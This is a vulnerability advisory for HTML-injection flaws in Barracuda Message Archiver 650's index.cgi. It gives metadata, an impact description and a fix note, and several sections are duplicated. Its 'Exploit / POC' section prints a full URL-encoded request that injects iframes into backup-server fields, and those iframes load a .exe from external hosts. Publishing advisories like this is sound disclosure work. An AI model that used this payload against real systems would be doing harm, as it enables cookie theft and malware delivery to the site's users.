Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
BID:50535
Info
Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
| Bugtraq ID: | 50535 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2011 12:00AM |
| Updated: | Mar 19 2015 09:30AM |
| Credit: | Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) |
| Vulnerable: |
Barracuda Networks Message Archiver 650 |
| Not Vulnerable: | |
Discussion
Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
Barracuda Message Archiver is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Barracuda Message Archiver 650 is vulnerable; other versions may also be affected.
Barracuda Message Archiver is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Barracuda Message Archiver 650 is vulnerable; other versions may also be affected.
Exploit / POC
Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URI is available:
http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-
example.exe%20width%3D800%20height%3D800%3E&&user=guest&&password=164ddc8feaa60cb4263cd93279e2c114&&et=1261213168&&locale=en_US
An attacker can exploit these issues through a browser.
The following example URI is available:
http://www.example.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%20width%3D800%20height%3D800%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//example2.com/etc/bad-
example.exe%20width%3D800%20height%3D800%3E&&user=guest&&password=164ddc8feaa60cb4263cd93279e2c114&&et=1261213168&&locale=en_US
Solution / Fix
Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
Solution:
Vendor updates are available. Please see the reference for more information.
Solution:
Vendor updates are available. Please see the reference for more information.
References
Barracuda Message Archiver 'index.cgi' Multiple HTML-injection Vulnerabilities
References:
References:
- Barracuda Message Archiver Homepage (Barracuda Networks, Inc.)